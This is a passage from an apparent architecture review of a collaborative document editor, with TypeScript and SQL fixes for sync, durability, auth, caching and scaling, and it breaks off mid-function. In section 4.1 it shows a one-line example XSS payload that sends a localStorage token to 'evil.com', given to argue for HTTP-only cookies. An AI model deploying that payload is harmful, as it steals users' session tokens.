class DocumentAwareLoadBalancer {
  private servers: string[];
  private hashRing: ConsistentHashRing;

  constructor(servers: string[]) {
    this.servers = servers;
    this.hashRing = new ConsistentHashRing(servers, 150); // 150 virtual nodes
  }

  getServerForDocument(documentId: string): string {
    return this.hashRing.getNode(documentId);
  }

  // Handle server failures gracefully
  removeServer(server: string): void {
    this.hashRing.removeNode(server);
    // Clients will reconnect and get routed to new server
  }
}

Trade-offs:

Approach	Pros	Cons
Redis Pub/Sub	Decoupled servers, any server can handle any doc	Additional infrastructure, Redis becomes SPOF
Sticky sessions	Simpler, no cross-server communication	Uneven load, complex failover
Dedicated doc servers	Best performance per document	Complex routing, underutilization

Issue 2.2: 2-Second Polling Creates Unacceptable Latency

The Problem: Even with Redis Pub/Sub, the architecture mentions polling PostgreSQL every 2 seconds as a fallback. This creates:

Up to 2 seconds of latency for changes
Unnecessary database load
Poor user experience for collaboration

Solution: Event-Driven Architecture with PostgreSQL LISTEN/NOTIFY

import { Pool, Client } from 'pg';

class PostgresChangeNotifier {
  private listenerClient: Client;
  private pool: Pool;
  private handlers: Map<string, Set<(change: any) => void>> = new Map();

  async initialize(): Promise<void> {
    this.listenerClient = new Client(process.env.DATABASE_URL);
    await this.listenerClient.connect();
    
    await this.listenerClient.query('LISTEN document_changes');
    
    this.listenerClient.on('notification', (msg) => {
      if (msg.channel === 'document_changes' && msg.payload) {
        const change = JSON.parse(msg.payload);
        this.notifyHandlers(change.document_id, change);
      }
    });
  }

  subscribe(documentId: string, handler: (change: any) => void): () => void {
    if (!this.handlers.has(documentId)) {
      this.handlers.set(documentId, new Set());
    }
    this.handlers.get(documentId)!.add(handler);

    // Return unsubscribe function
    return () => {
      this.handlers.get(documentId)?.delete(handler);
    };
  }

  private notifyHandlers(documentId: string, change: any): void {
    const handlers = this.handlers.get(documentId);
    if (handlers) {
      for (const handler of handlers) {
        handler(change);
      }
    }
  }
}

// Database trigger to send notifications
/*
CREATE OR REPLACE FUNCTION notify_document_change()
RETURNS TRIGGER AS $$
BEGIN
  PERFORM pg_notify(
    'document_changes',
    json_build_object(
      'document_id', NEW.document_id,
      'operation_id', NEW.id,
      'operation', NEW.operation,
      'revision', NEW.revision
    )::text
  );
  RETURN NEW;
END;
$$ LANGUAGE plpgsql;

CREATE TRIGGER document_change_trigger
AFTER INSERT ON document_operations
FOR EACH ROW EXECUTE FUNCTION notify_document_change();
*/

3. Data Storage and Durability Issues

Issue 3.1: 30-Second Snapshot Interval Causes Data Loss

The Problem: If a server crashes, up to 30 seconds of work is lost. For a real-time editor, this is catastrophic.

Timeline:
00:00 - Snapshot saved
00:15 - Alice types 500 words
00:29 - Server crashes
00:30 - Server restarts

Result: Alice's 500 words are gone forever

Solution: Operation Log with Periodic Compaction

interface DocumentOperation {
  id: string;
  documentId: string;
  userId: string;
  revision: number;
  operation: Operation[];  // OT operations
  timestamp: HLC;
  checksum: string;
}

class DurableDocumentStore {
  private pool: Pool;
  private redis: Redis;

  async applyOperation(op: DocumentOperation): Promise<void> {
    const client = await this.pool.connect();
    
    try {
      await client.query('BEGIN');

      // 1. Append to operation log (durable)
      await client.query(`
        INSERT INTO document_operations 
        (id, document_id, user_id, revision, operation, timestamp, checksum)
        VALUES ($1, $2, $3, $4, $5, $6, $7)
      `, [op.id, op.documentId, op.userId, op.revision, 
          JSON.stringify(op.operation), op.timestamp, op.checksum]);

      // 2. Update materialized view (for fast reads)
      await client.query(`
        UPDATE documents 
        SET current_revision = $1, 
            last_modified = NOW(),
            content = apply_operation(content, $2)
        WHERE id = $3 AND current_revision = $4
      `, [op.revision, JSON.stringify(op.operation), op.documentId, op.revision - 1]);

      await client.query('COMMIT');

      // 3. Cache in Redis for real-time sync
      await this.redis.xadd(
        `doc:${op.documentId}:ops`,
        'MAXLEN', '~', '10000',  // Keep last ~10k operations
        '*',
        'data', JSON.stringify(op)
      );

    } catch (error) {
      await client.query('ROLLBACK');
      throw error;
    } finally {
      client.release();
    }
  }

  // Periodic compaction job
  async compactDocument(documentId: string): Promise<void> {
    const client = await this.pool.connect();
    
    try {
      await client.query('BEGIN');

      // Get current state
      const { rows: [doc] } = await client.query(
        'SELECT content, current_revision FROM documents WHERE id = $1 FOR UPDATE',
        [documentId]
      );

      // Create snapshot
      await client.query(`
        INSERT INTO document_snapshots (document_id, revision, content, created_at)
        VALUES ($1, $2, $3, NOW())
      `, [documentId, doc.current_revision, doc.content]);

      // Delete old operations (keep last 1000 for undo history)
      await client.query(`
        DELETE FROM document_operations 
        WHERE document_id = $1 
        AND revision < $2 - 1000
      `, [documentId, doc.current_revision]);

      await client.query('COMMIT');
    } finally {
      client.release();
    }
  }

  // Recover document from operations
  async recoverDocument(documentId: string): Promise<string> {
    // Find latest snapshot
    const { rows: [snapshot] } = await this.pool.query(`
      SELECT content, revision FROM document_snapshots 
      WHERE document_id = $1 
      ORDER BY revision DESC LIMIT 1
    `, [documentId]);

    let content = snapshot?.content ?? '';
    let fromRevision = snapshot?.revision ?? 0;

    // Apply all operations since snapshot
    const { rows: operations } = await this.pool.query(`
      SELECT operation FROM document_operations 
      WHERE document_id = $1 AND revision > $2
      ORDER BY revision ASC
    `, [documentId, fromRevision]);

    for (const op of operations) {
      content = applyOperation(content, JSON.parse(op.operation));
    }

    return content;
  }
}

Database Schema:

-- Immutable operation log
CREATE TABLE document_operations (
    id UUID PRIMARY KEY,
    document_id UUID NOT NULL REFERENCES documents(id),
    user_id UUID NOT NULL REFERENCES users(id),
    revision BIGINT NOT NULL,
    operation JSONB NOT NULL,
    timestamp JSONB NOT NULL,  -- HLC
    checksum VARCHAR(64) NOT NULL,
    created_at TIMESTAMPTZ DEFAULT NOW(),
    
    UNIQUE(document_id, revision)
);

-- Index for efficient replay
CREATE INDEX idx_doc_ops_replay 
ON document_operations(document_id, revision);

-- Periodic snapshots for fast recovery
CREATE TABLE document_snapshots (
    id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
    document_id UUID NOT NULL REFERENCES documents(id),
    revision BIGINT NOT NULL,
    content TEXT NOT NULL,
    created_at TIMESTAMPTZ DEFAULT NOW(),
    
    UNIQUE(document_id, revision)
);

-- Materialized current state (for fast reads)
CREATE TABLE documents (
    id UUID PRIMARY KEY,
    title VARCHAR(500),
    content TEXT,
    current_revision BIGINT DEFAULT 0,
    created_at TIMESTAMPTZ DEFAULT NOW(),
    last_modified TIMESTAMPTZ DEFAULT NOW()
);

Trade-offs:

Approach	Pros	Cons
Operation log	Zero data loss, full history	Storage grows, need compaction
Frequent snapshots	Simple recovery	Still some data loss window
Write-ahead log	Database handles durability	Tied to specific database

Issue 3.2: Full HTML Snapshots Are Inefficient and Dangerous

The Problem:

Storage bloat: A 10KB document with 1000 edits = 10MB of snapshots
XSS vulnerabilities: Storing raw HTML allows script injection
Format lock-in: Can't easily migrate to different rendering

Solution: Structured Document Model with Delta Storage

// Structured document model (similar to ProseMirror/Slate)
interface DocumentNode {
  type: 'doc' | 'paragraph' | 'heading' | 'list' | 'listItem' | 'text';
  content?: DocumentNode[];
  text?: string;
  marks?: Mark[];  // bold, italic, link, etc.
  attrs?: Record<string, any>;
}

interface Mark {
  type: 'bold' | 'italic' | 'underline' | 'link' | 'code';
  attrs?: Record<string, any>;
}

// Example document
const exampleDoc: DocumentNode = {
  type: 'doc',
  content: [
    {
      type: 'heading',
      attrs: { level: 1 },
      content: [{ type: 'text', text: 'My Document' }]
    },
    {
      type: 'paragraph',
      content: [
        { type: 'text', text: 'Hello ' },
        { type: 'text', text: 'world', marks: [{ type: 'bold' }] }
      ]
    }
  ]
};

// Sanitization on input
class DocumentSanitizer {
  private allowedNodeTypes = new Set([
    'doc', 'paragraph', 'heading', 'list', 'listItem', 'text',
    'blockquote', 'codeBlock', 'image', 'table', 'tableRow', 'tableCell'
  ]);
  
  private allowedMarks = new Set([
    'bold', 'italic', 'underline', 'strike', 'code', 'link'
  ]);

  sanitize(node: DocumentNode): DocumentNode {
    if (!this.allowedNodeTypes.has(node.type)) {
      // Convert unknown types to paragraph
      return { type: 'paragraph', content: this.sanitizeContent(node.content) };
    }

    return {
      type: node.type,
      ...(node.text && { text: this.sanitizeText(node.text) }),
      ...(node.content && { content: this.sanitizeContent(node.content) }),
      ...(node.marks && { marks: this.sanitizeMarks(node.marks) }),
      ...(node.attrs && { attrs: this.sanitizeAttrs(node.type, node.attrs) })
    };
  }

  private sanitizeText(text: string): string {
    // Remove any potential script injections
    return text.replace(/<[^>]*>/g, '');
  }

  private sanitizeMarks(marks: Mark[]): Mark[] {
    return marks.filter(m => this.allowedMarks.has(m.type));
  }

  private sanitizeAttrs(nodeType: string, attrs: Record<string, any>): Record<string, any> {
    const sanitized: Record<string, any> = {};
    
    switch (nodeType) {
      case 'heading':
        sanitized.level = Math.min(6, Math.max(1, parseInt(attrs.level) || 1));
        break;
      case 'link':
        // Only allow safe URL schemes
        if (attrs.href && /^https?:\/\//.test(attrs.href)) {
          sanitized.href = attrs.href;
        }
        break;
      case 'image':
        if (attrs.src && /^https?:\/\//.test(attrs.src)) {
          sanitized.src = attrs.src;
          sanitized.alt = String(attrs.alt || '').slice(0, 500);
        }
        break;
    }
    
    return sanitized;
  }
}

// Render to HTML only on output
class DocumentRenderer {
  render(node: DocumentNode): string {
    switch (node.type) {
      case 'doc':
        return node.content?.map(n => this.render(n)).join('') ?? '';
      
      case 'paragraph':
        return `<p>${this.renderContent(node)}</p>`;
      
      case 'heading':
        const level = node.attrs?.level ?? 1;
        return `<h${level}>${this.renderContent(node)}</h${level}>`;
      
      case 'text':
        let text = this.escapeHtml(node.text ?? '');
        for (const mark of node.marks ?? []) {
          text = this.applyMark(text, mark);
        }
        return text;
      
      default:
        return this.renderContent(node);
    }
  }

  private escapeHtml(text: string): string {
    return text
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;');
  }

  private applyMark(text: string, mark: Mark): string {
    switch (mark.type) {
      case 'bold': return `<strong>${text}</strong>`;
      case 'italic': return `<em>${text}</em>`;
      case 'code': return `<code>${text}</code>`;
      case 'link': return `<a href="${this.escapeHtml(mark.attrs?.href ?? '')}">${text}</a>`;
      default: return text;
    }
  }
}

4. Security Vulnerabilities

Issue 4.1: JWT in localStorage is Vulnerable to XSS

The Problem: Any XSS vulnerability (from user content, third-party scripts, browser extensions) can steal tokens.

// Attacker's XSS payload
fetch('https://evil.com/steal', {
  method: 'POST',
  body: localStorage.getItem('token')
});
// Attacker now has 24-hour access to victim's account

Solution: HTTP-Only Cookies with Proper Security Flags

// Server-side: Set secure cookies
import { Response } from 'express';

class AuthService {
  setAuthCookies(res: Response, tokens: { accessToken: string; refreshToken: string }): void {
    // Access token - short lived, used for API calls
    res.cookie('access_token', tokens.accessToken, {
      httpOnly: true,           // Not accessible via JavaScript
      secure: true,             // HTTPS only
      sameSite: 'strict',       // CSRF protection
      maxAge: 15 * 60 * 1000,   // 15 minutes
      path: '/api'              // Only sent to API routes
    });

    // Refresh token - longer lived, only sent to refresh endpoint
    res.cookie('refresh_token', tokens.refreshToken, {
      httpOnly: true,
      secure: true,
      sameSite: 'strict',
      maxAge: 7 * 24 * 60 * 60 * 1000,  // 7 days
      path: '/api/auth/refresh'          // Only sent to refresh endpoint
    });

    // CSRF token - readable by JavaScript, verified on state-changing requests
    const csrfToken = crypto.randomBytes(32).toString('hex');
    res.cookie('csrf_token', csrfToken, {
      httpOnly: false,  // Readable by JavaScript
      secure: true,
      sameSite: 'strict',
      maxAge: 15 * 60 * 1000
    });
  }
}

// Middleware to verify CSRF token
function csrfProtection(req: Request, res: Response, next: NextFunction): void {
  if (['POST', 'PUT', 'DELETE', 'PATCH'].includes(req.method)) {
    const cookieToken = req.cookies.csrf_token;
    const headerToken = req.headers['x-csrf-token'];
    
    if (!cookieToken || !headerToken || cookieToken !== headerToken) {
      return res.status(403).json({ error: 'Invalid CSRF token' });
    }
  }
  next();
}

// Client-side: Include CSRF token in requests
class ApiClient {
  private getCsrfToken(): string {
    return document.cookie
      .split('; ')
      .find(row => row.startsWith('csrf_token='))
      ?.split('=')[1] ?? '';
  }

  async request(url: string, options: RequestInit = {}): Promise<Response> {
    return fetch(url, {
      ...options,
      credentials: 'include',  // Include cookies
      headers: {
        ...options.headers,
        'X-CSRF-Token': this.getCsrfToken()
      }
    });
  }
}

WebSocket Authentication:

// WebSocket connections need special handling since they don't send cookies automatically
class SecureWebSocketServer {
  handleUpgrade(request: IncomingMessage, socket: Socket, head: Buffer): void {
    // Option 1: Verify cookie on upgrade
    const cookies = this.parseCookies(request.headers.cookie ?? '');
    const accessToken = cookies.access_token;
    
    try {
      const payload = this.verifyToken(accessToken);
      
      this.wss.handleUpgrade(request, socket, head, (ws) => {
        (ws as any).userId = payload.userId;
        this.wss.emit('connection', ws, request);
      });
    } catch (error) {
      socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
      socket.destroy();
    }
  }

  // Option 2: Ticket-based authentication
  async generateWebSocketTicket(userId: string): Promise<string> {
    const ticket = crypto.randomBytes(32).toString('hex');
    
    // Store ticket with short expiry
    await this.redis.setex(`ws_ticket:${ticket}`, 30, userId);
    
    return ticket;
  }

  async validateTicket(ticket: string): Promise<string | null> {
    const userId = await this.redis.get(`ws_ticket:${ticket}`);
    if (userId) {
      await this.redis.del(`ws_ticket:${ticket}`);  // One-time use
    }
    return userId;
  }
}

Trade-offs:

Approach	Pros	Cons
HTTP-only cookies	XSS-resistant	Need CSRF protection, more complex
localStorage + fingerprinting	Simpler	Vulnerable to XSS
Session IDs only	Most secure	Requires server-side session store

Issue 4.2: 24-Hour Token Expiry is Too Long

The Problem: If a token is compromised, the attacker has 24 hours of access. For a document editor with sensitive content, this is too risky.

Solution: Short-Lived Access Tokens with Refresh Token Rotation

class TokenService {
  private readonly ACCESS_TOKEN_EXPIRY = '15m';
  private readonly REFRESH_TOKEN_EXPIRY = '7d';

  async generateTokenPair(userId: string): Promise<TokenPair> {
    const tokenFamily = crypto.randomUUID();
    
    const accessToken = jwt.sign(
      { userId, type: 'access' },
      process.env.JWT_SECRET!,
      { expiresIn: this.ACCESS_TOKEN_EXPIRY }
    );

    const refreshToken = jwt.sign(
      { userId, type: 'refresh', family: tokenFamily },
      process.env.JWT_REFRESH_SECRET!,
      { expiresIn: this.REFRESH_TOKEN_EXPIRY }
    );

    // Store refresh token hash for revocation
    await this.redis.setex(
      `refresh:${tokenFamily}`,
      7 * 24 * 60 * 60,
      JSON.stringify({
        userId,
        tokenHash: this.hashToken(refreshToken),
        createdAt: Date.now()
      })
    );

    return { accessToken, refreshToken };
  }

  async refreshTokens(refreshToken: string): Promise<TokenPair | null> {
    try {
      const payload = jwt.verify(refreshToken, process.env.JWT_REFRESH_SECRET!) as any;
      
      // Check if token family is still valid
      const storedData = await this.redis.get(`refresh:${payload.family}`);
      if (!storedData) {
        // Token family was revoked - possible token theft!
        await this.revokeAllUserSessions(payload.userId);
        return null;
      }

      const stored = JSON.parse(storedData);
      
      // Verify token hash matches
      if (stored.tokenHash !== this.hashToken(refreshToken)) {
        // Token reuse detected - revoke family
        await this.redis.del(`refresh:${payload.family}`);
        await this.revokeAllUserSessions(payload.userId);
        return null;
      }

      // Generate new token pair (rotation)
      const newTokens = await this.generateTokenPair(payload.userId);
      
      // Invalidate old family
      await this.redis.del(`refresh:${payload.family}`);

      return newTokens;
    } catch (error) {
      return null;
    }
  }

  private hashToken(token: string): string {
    return crypto.createHash('sha256').update(token).digest('hex');
  }

  async revokeAllUserSessions(userId: string): Promise<void> {
    // In production, use a more efficient approach with user-specific key patterns
    const keys = await this.redis.keys('refresh:*');
    for (const key of keys) {
      const data = await this.redis.get(key);
      if (data && JSON.parse(data).userId === userId) {
        await this.redis.del(key);
      }
    }
  }
}

Issue 4.3: Missing Document-Level Authorization

The Problem: The architecture doesn't mention access control. Can any authenticated user access any document?

Solution: Document Permission System

enum Permission {
  VIEW = 'view',
  COMMENT = 'comment',
  EDIT = 'edit',
  ADMIN = 'admin'
}

interface DocumentAccess {
  documentId: string;
  principalType: 'user' | 'group' | 'organization' | 'public';
  principalId: string | null;  // null for public
  permission: Permission;
}

class DocumentAuthorizationService {
  private cache: Redis;
  private pool: Pool;

  async checkPermission(
    userId: string,
    documentId: string,
    requiredPermission: Permission
  ): Promise<boolean> {
    // Check cache first
    const cacheKey = `authz:${userId}:${documentId}`;
    const cached = await this.cache.get(cacheKey);
    
    if (cached) {
      return this.permissionSatisfies(cached as Permission, requiredPermission);
    }

    // Query database
    const effectivePermission = await this.getEffectivePermission(userId, documentId);
    
    // Cache for 5 minutes
    if (effectivePermission) {
      await this.cache.setex(cacheKey, 300, effectivePermission);
    }

    return this.permissionSatisfies(effectivePermission, requiredPermission);
  }

  private async getEffectivePermission(
    userId: string,
    documentId: string
  ): Promise<Permission | null> {
    const { rows } = await this.pool.query(`
      WITH user_groups AS (
        SELECT group_id FROM group_members WHERE user_id = $1
      ),
      user_org AS (
        SELECT organization_id FROM users WHERE id = $1
      )
      SELECT permission FROM document_access
      WHERE document_id = $2
      AND (
        (principal_type = 'user' AND principal_id = $1)
        OR (principal_type = 'group' AND principal_id IN (SELECT group_id FROM user_groups))
        OR (principal_type = 'organization' AND principal_id = (SELECT organization_id FROM user_org))
        OR (principal_type = 'public')
      )
      ORDER BY 
        CASE permission
          WHEN 'admin' THEN 4
          WHEN 'edit' THEN 3
          WHEN 'comment' THEN 2
          WHEN 'view' THEN 1
        END DESC
      LIMIT 1
    `, [userId, documentId]);

    return rows[0]?.permission ?? null;
  }

  private permissionSatisfies(has: Permission | null, needs: Permission): boolean {
    if (!has) return false;
    
    const hierarchy: Record<Permission, number> = {
      [Permission.VIEW]: 1,
      [Permission.COMMENT]: 2,
      [Permission.EDIT]: 3,
      [Permission.ADMIN]: 4
    };

    return hierarchy[has] >= hierarchy[needs];
  }

  // Invalidate cache when permissions change
  async invalidateDocumentCache(documentId: string): Promise<void> {
    const keys = await this.cache.keys(`authz:*:${documentId}`);
    if (keys.length > 0) {
      await this.cache.del(...keys);
    }
  }
}

// Middleware
function requirePermission(permission: Permission) {
  return async (req: Request, res: Response, next: NextFunction) => {
    const { documentId } = req.params;
    const userId = req.user!.id;

    const hasPermission = await authzService.checkPermission(
      userId,
      documentId,
      permission
    );

    if (!hasPermission) {
      return res.status(403).json({ error: 'Insufficient permissions' });
    }

    next();
  };
}

// Usage
app.get('/api/documents/:documentId', requirePermission(Permission.VIEW), getDocument);
app.put('/api/documents/:documentId', requirePermission(Permission.EDIT), updateDocument);
app.delete('/api/documents/:documentId', requirePermission(Permission.ADMIN), deleteDocument);

5. Caching Catastrophes

Issue 5.1: CDN Caching API Responses for 5 Minutes

The Problem: Caching API responses for collaborative documents is fundamentally broken:

10:00:00 - Alice requests document, CDN caches response
10:00:30 - Bob edits document
10:04:59 - Alice requests document again, gets stale cached version
           Alice sees version from 5 minutes ago!

Solution: Proper Cache Control Headers

class CacheControlMiddleware {
  // Never cache document content or real-time data
  static noCache(req: Request, res: Response, next: NextFunction): void {
    res.set({
      'Cache-Control': 'no-store, no-cache, must-revalidate, proxy-revalidate',
      'Pragma': 'no-cache',
      'Expires': '0',
      'Surrogate-Control': 'no-store'
    });
    next();
  }

  // Cache static assets aggressively
  static staticAssets(req: Request, res: Response, next: NextFunction): void {
    res.set({
      'Cache-Control': 'public, max-age=31536000, immutable'
    });
    next();
  }

  // Cache user-specific data privately with revalidation
  static privateWithRevalidation(maxAge: number) {
    return (req: Request, res: Response, next: NextFunction) => {
      res.set({
        'Cache-Control': `private, max-age=${maxAge}, must-revalidate`,
        'Vary': 'Authorization, Cookie'
      });
      next();
    };
  }

  // Cache public data with ETag validation
  static publicWithEtag(req: Request, res: Response, next: NextFunction): void {
    res.set({
      'Cache-Control': 'public, max-age=0, must-revalidate',
      'Vary': 'Accept-Encoding'
    });
    next();
  }
}

// Apply to routes
app.use('/api/documents/:id/content', CacheControlMiddleware.noCache);
app.use('/api/documents/:id/operations', CacheControlMiddleware.noCache);
app.use('/api/users/me', CacheControlMiddleware.privateWithRevalidation(60));
app.use('/api/documents', CacheControlMiddleware.publicWithEtag);  // List with ETags
app.use('/static', CacheControlMiddleware.staticAssets);

What CAN be cached:

// Safe to cache:
// 1. Static assets (JS, CSS, images) - with content hash in filename
// 2. User profile data - short TTL, private
// 3. Document metadata (title, last modified) - with ETag validation
// 4. Organization/team data - short TTL

// CloudFront configuration
const cloudFrontBehaviors = {
  '/static/*': {
    TTL: 31536000,  // 1 year
    compress: true,
    headers: ['Origin']
  },
  '/api/documents/*/content': {
    TTL: 0,  // Never cache
    forwardCookies: 'all',
    forwardHeaders: ['Authorization']
  },
  '/api/*': {
    TTL: 0,
    forwardCookies: 'all',
    forwardHeaders: ['Authorization', 'X-CSRF-Token']
  }
};

6. Scaling Bottlenecks

Issue 6.1: PostgreSQL as Real-Time Message Bus

The Problem: Using PostgreSQL for real-time sync creates:

Write amplification (every keystroke = database write)
Connection exhaustion under load
Latency spikes during vacuuming/checkpointing

100 users typing at 5 chars/second = 500 writes/second
1000 users = 5000 writes/second
PostgreSQL will struggle, and latency will spike

Solution: Tiered Storage Architecture

class TieredDocumentStorage {
  private redis: Redis;
  private pool: Pool;
  private operationBuffer: Map<string, DocumentOperation[]> = new Map();
  private flushInterval: NodeJS.Timeout;

  constructor() {
    // Flush buffered operations every 100ms
    this.flushInterval = setInterval(() => this.flushBuffers(), 100);
  }

  async applyOperation(op: DocumentOperation): Promise<void> {
    // Layer 1: Immediate - Redis for real-time sync
    await this.redis.multi()
      .xadd(
        `doc:${op.documentId}:ops`,
        'MAXLEN', '~', '1000',
        '*',
        'data', JSON.stringify(op)
      )
      .publish(`doc:${op.documentId}`, JSON.stringify(op))
      .exec();

    // Layer 2: Buffered - Batch writes to PostgreSQL
    if (!this.operationBuffer.has(op.documentId)) {
      this.operationBuffer.set(op.documentId, []);
    }
    this.operationBuffer.get(op.documentId)!.push(op);
  }

  private async flushBuffers(): Promise<void> {
    const buffers = new Map(this.operationBuffer);
    this.operationBuffer.clear();

    for (const [documentId, operations] of buffers) {
      if (operations.length === 0) continue;

      try {
        await this.batchInsertOperations(operations);
      } catch (error) {
        // Re-queue failed operations
        const existing = this.operationBuffer.get(documentId) ?? [];
        this.operationBuffer.set(documentId, [...operations, ...existing]);
        console.error(`Failed to flush operations for ${documentId}:`, error);
      }
    }
  }

  private async batchInsertOperations(operations: DocumentOperation[]): Promise<void> {
    const values = operations.map((op, i) => {
      const offset = i * 7;
      return `($${offset + 1}, $${offset + 2}, $${offset + 3}, $${offset + 4}, $${offset + 5}, $${offset + 6}, $${offset + 7})`;
    }).join(', ');

    const params = operations.flatMap(op => [
      op.id, op.documentId, op.userId, op.revision,
      JSON.stringify(op.operation), JSON.stringify(op.timestamp), op.checksum
    ]);

    await this.pool.query(`
      INSERT INTO document_operations 
      (id, document_id, user_id, revision, operation, timestamp, checksum)
      VALUES ${values}
      ON CONFLICT (document_id, revision) DO NOTHING
    `, params);
  }

  // Recovery: Rebuild from PostgreSQL if Redis data is lost
  async recoverFromPostgres(documentId: string, fromRevision: number): Promise<DocumentOperation[]> {
    const { rows } = await this.pool.query(`
      SELECT * FROM document_operations
      WHERE document_id = $1 AND revision > $2
      ORDER BY revision ASC
    `, [documentId, fromRevision]);

    return rows.map(row => ({
      id: row.id,
      documentId: row.document_id,
      userId: row.user_id,
      revision: row.revision,
      operation: JSON.parse(row.operation),
      timestamp: JSON.parse(row.timestamp),
      checksum: row.checksum
    }));
  }
}

Issue 6.2: Organization-Based Partitioning Causes Hot Spots

The Problem: Large organizations (e.g., enterprise customers) create hot partitions:

Organization A (10 users):     Partition 1 - light load
Organization B (10,000 users): Partition 2 - overwhelmed
Organization C (50 users):     Partition 3 - light load

Solution: Document-Level Sharding with Consistent Hashing

class DocumentShardRouter {
  private shards: ShardInfo[];
  private hashRing: ConsistentHashRing;

  constructor(shards: ShardInfo[]) {
    this.shards = shards;
    this.hashRing = new ConsistentHashRing(
      shards.map(s => s.id),
      100  // Virtual nodes per shard
    );
  }

  getShardForDocument(documentId: string): ShardInfo {
    const shardId = this.hashRing.getNode(documentId);
    return this.shards.find(s => s.id === shardId)!;
  }

  // Rebalance when adding/removing shards
  async addShard(newShard: ShardInfo): Promise<void> {
    this.shards.push(newShard);
    this.hashRing.addNode(newShard.id);
    
    // Migrate affected documents
    await this.migrateDocuments(newShard);
  }

  private async migrateDocuments(targetShard: ShardInfo): Promise<void> {
    // Find documents that should now be on the new shard
    for (const shard of this.shards) {
      if (shard.id === targetShard.id) continue;

      const documents = await this.getDocumentsOnShard(shard);
      for (const doc of documents) {
        const correctShard = this.getShardForDocument(doc.id);
        if (correctShard.id === targetShard.id) {
          await this.migrateDocument(doc.id, shard, targetShard);
        }
      }
    }
  }
}

// Shard-aware connection pool
class ShardedConnectionPool {
  private pools: Map<string, Pool> = new Map();
  private router: DocumentShardRouter;

  async query(documentId: string, sql: string, params: any[]): Promise<QueryResult> {
    const shard = this.router.getShardForDocument(documentId);
    const pool = this.pools.get(shard.id);
    
    if (!pool) {
      throw new Error(`No pool for shard ${shard.id}`);
    }

    return pool.query(sql, params);
  }

  // Cross-shard queries (avoid when possible)
  async queryAll(sql: string, params: any[]): Promise<QueryResult[]> {
    const results = await Promise.all(
      Array.from(this.pools.values()).map(pool => pool.query(sql, params))
    );
    return results;
  }
}

Alternative: Vitess or Citus for Automatic Sharding

-- Citus distributed table
SELECT create_distributed_table('document_operations', 'document_id');
SELECT create_distributed_table('documents', 'id');

-- Queries automatically route to correct shard
SELECT * FROM documents WHERE id = 'doc-123';  -- Routes to one shard
SELECT * FROM documents WHERE organization_id = 'org-456';  -- Fan-out query

Issue 6.3: Read Replicas with Replication Lag

The Problem: Read replicas can be seconds behind the primary, causing users to see stale data:

10:00:00.000 - Alice saves document (writes to primary)
10:00:00.500 - Alice refreshes page (reads from replica)
              Replica is 1 second behind - Alice sees old version!
              "Where did my changes go?!"

Solution: Read-Your-Writes Consistency

class ConsistentReadService {
  private primaryPool: Pool;
  private replicaPool: Pool;
  private redis: Redis;

  async read(
    userId: string,
    documentId: string,
    query: string,
    params: any[]
  ): Promise<QueryResult> {
    // Check if user recently wrote to this document
    const lastWriteTime = await this.redis.get(`write:${userId}:${documentId}`);
    
    if (lastWriteTime) {
      const timeSinceWrite = Date.now() - parseInt(lastWriteTime);
      
      // If write was recent, check replica lag
      if (timeSinceWrite < 10000) {  // Within 10 seconds
        const replicaLag = await this.getReplicaLag();
        
        if (replicaLag * 1000 > timeSinceWrite) {
          // Replica hasn't caught up - read from primary
          return this.primaryPool.query(query, params);
        }
      }
    }

    // Safe to read from replica
    return this.replicaPool.query(query, params);
  }

  async write(
    userId: string,
    documentId: string,
    query: string,
    params: any[]
  ): Promise<QueryResult> {
    const result = await this.primaryPool.query(query, params);
    
    // Track write time for read-your-writes consistency
    await this.redis.setex(
      `write:${userId}:${documentId}`,
      60,  // Track for 60 seconds
      Date.now().toString()
    );

    return result;
  }

  private async getReplicaLag(): Promise<number> {
    const { rows } = await this.replicaPool.query(`
      SELECT EXTRACT(EPOCH FROM (NOW() - pg_last_xact_replay_timestamp())) AS lag
    `);
    return rows[0]?.lag ?? 0;
  }
}

// Alternative: LSN-based consistency
class LSNConsistentReadService {
  async write(userId: string, query: string, params: any[]): Promise<{ result: QueryResult; lsn: string }> {
    const result = await this.primaryPool.query(query, params);
    
    // Get current WAL position
    const { rows } = await this.primaryPool.query('SELECT pg_current_wal_lsn()::text AS lsn');
    const lsn = rows[0].lsn;
    
    // Store LSN for user's session
    await this.redis.setex(`session:${userId}:lsn`, 300, lsn);
    
    return { result, lsn };
  }

  async read(userId: string, query: string, params: any[]): Promise<QueryResult> {
    const requiredLsn = await this.redis.get(`session:${userId}:lsn`);
    
    if (requiredLsn) {
      // Wait for replica to catch up (with timeout)
      await this.waitForReplicaLsn(requiredLsn, 5000);
    }

    return this.replicaPool.query(query, params);
  }

  private async waitForReplicaLsn(targetLsn: string, timeoutMs: number): Promise<void> {
    const start = Date.now();
    
    while (Date.now() - start < timeoutMs) {
      const { rows } = await this.replicaPool.query(`
        SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn AS caught_up
      `, [targetLsn]);
      
      if (rows[0].caught_up) return;
      
      await new Promise(resolve => setTimeout(resolve, 50));
    }
    
    // Timeout - fall back to primary
    throw new Error('Replica lag timeout');
  }
}

7. WebSocket Connection Management

Issue 7.1: No Reconnection Strategy

The Problem: WebSocket connections drop frequently (network changes, mobile sleep, etc.). Without proper reconnection, users lose real-time updates.

Solution: Robust Reconnection with Exponential Backoff

class ResilientWebSocket {
  private ws: WebSocket | null = null;
  private url: string;
  private reconnectAttempts = 0;
  private maxReconnectAttempts = 10;
  private baseDelay = 1000;
  private maxDelay = 30000;
  private messageQueue: string[] = [];
  private lastEventId: string | null = null;

  constructor(url: string) {
    this.url = url;
    this.connect();
  }

  private connect(): void {
    // Include last event ID for resumption
    const connectUrl = this.lastEventId 
      ? `${this.url}?lastEventId=${this.lastEventId}`
      : this.url;

    this.ws = new WebSocket(connectUrl);

    this.ws.onopen = () => {
      console.log('WebSocket connected');
      this.reconnectAttempts = 0;
      this.flushMessageQueue();
    };

    this.ws.onclose = (event) => {
      if (event.code !== 1000) {  // Not a clean close
        this.scheduleReconnect();
      }
    };

    this.ws.onerror = (error) => {
      console.error('WebSocket error:', error);
    };

    this.ws.onmessage = (event) => {
      const data = JSON.parse(event.data);
      if (data.eventId) {
        this.lastEventId = data.eventId;
      }
      this.handleMessage(data);
    };
  }

  private scheduleReconnect(): void {
    if (this.reconnectAttempts >= this.maxReconnectAttempts) {
